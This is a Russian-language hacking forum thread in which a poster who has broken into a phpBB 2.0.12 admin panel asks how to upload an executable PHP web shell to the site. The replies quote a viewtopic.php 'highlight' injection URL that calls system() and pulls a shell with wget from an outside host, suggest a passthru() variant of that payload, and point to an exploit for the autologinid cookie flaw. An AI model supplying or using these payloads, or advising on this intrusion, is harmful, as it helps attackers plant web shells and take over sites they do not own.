|
O5 25: phpBB, админка, шелл
Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить.
Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить? Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать. Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать. ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ! |
На вашем сайте видел такой способ:
http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527 Но он не работает. |
там же можно изменить разрешшения файлов загружаемых в админке
|
Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.
|
Нельзя там через файлы загрузить шелл.
Цитата:
Цитата:
|
2 KEZ
В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12. Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи. Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать. |
Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
|
А разве highlight='.passthru($HTTP_GET_VARS[cmd]).' не работает на 12 версии?
|
Цитата:
|
| Время: 12:42 |